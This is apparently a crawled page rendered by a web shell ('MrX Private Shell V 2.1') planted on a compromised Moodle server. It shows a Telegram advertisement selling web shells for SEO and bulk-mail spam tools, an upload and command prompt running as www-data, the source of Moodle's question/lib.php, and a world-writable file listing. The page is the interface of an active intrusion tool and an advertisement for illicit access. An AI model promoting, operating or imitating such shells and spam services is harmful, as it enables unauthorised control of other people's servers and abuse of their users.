__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Question related functions.
 *
 * This file was created just because Fragment API expects callbacks to be defined on lib.php
 *
 * Please, do not add new functions to this file.
 *
 * @package   core_question
 * @copyright 2018 Simey Lameze <simey@moodle.com>
 * @license   http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

defined('MOODLE_INTERNAL') || die();

require_once($CFG->dirroot . '/question/editlib.php');

/**
 * Question data fragment to get the question html via ajax call.
 *
 * @param array $args Arguments for rendering the fragment. Expected keys:
 *  * view - the view class
 *  * cmid - if in an activity, the course module ID.
 *  * filterquery - the current filters encoded as a URL parameter.
 *  * lastchanged - the ID of the last edited question.
 *  * sortdata - Array of sorted columns.
 *  * filtercondition - the current filters encoded as an object.
 *  * extraparams - additional parameters required for a particular view class.
 *
 * @return array|string
 */
function core_question_output_fragment_question_data(array $args): string {
    if (empty($args)) {
        return '';
    }
    [$params, $extraparams] = \core_question\local\bank\filter_condition_manager::extract_parameters_from_fragment_args($args);
    [
        $thispageurl,
        $contexts,
        ,
        $cm,
        ,
        $pagevars
    ] = question_build_edit_resources('questions', '/question/edit.php', $params);

    if (is_null($cm)) {
        $course = get_course(clean_param($args['courseid'], PARAM_INT));
    } else {
        $course = get_course($cm->course);
    }

    $viewclass = empty($args['view']) ? \core_question\local\bank\view::class : clean_param($args['view'], PARAM_NOTAGS);

    // Make sure the class passed through is valid (exists and is view or subclass of view).
    if (!class_exists($viewclass) || !is_a($viewclass, \core_question\local\bank\view::class, true)) {
        throw new invalid_parameter_exception('view parameter must be a valid view class');
    }

    if (!empty($args['lastchanged'])) {
        $thispageurl->param('lastchanged', clean_param($args['lastchanged'], PARAM_INT));
    }
    if (!empty($args['view'])) {
        $thispageurl->param('view', clean_param($args['view'], PARAM_NOTAGS));
    }
    if (!empty($args['extraparams'])) {
        $thispageurl->param('extraparams', clean_param($args['extraparams'], PARAM_RAW));
    }
    $questionbank = new $viewclass($contexts, $thispageurl, $course, $cm, $pagevars, $extraparams);
    $questionbank->add_standard_search_conditions();
    ob_start();
    $questionbank->display_question_list();
    return ob_get_clean();
}

Filemanager

Name Type Size Permission Actions
amd Folder 0777
bank Folder 0777
behaviour Folder 0777
classes Folder 0777
engine Folder 0777
format Folder 0777
templates Folder 0777
tests Folder 0777
type Folder 0777
yui Folder 0777
UPGRADING.md File 1.21 KB 0777
deprecatedlib.php File 2.44 KB 0777
edit.php File 2.44 KB 0777
editlib.php File 16.79 KB 0777
flags.js File 4.74 KB 0777
format.php File 46.39 KB 0777
lib.php File 3.27 KB 0777
qengine.js File 4.57 KB 0777
renderer.php File 6.83 KB 0777
toggleflag.php File 1.55 KB 0777
upgrade.php File 1.76 KB 0777
upgrade.txt File 22.99 KB 0777
Filemanager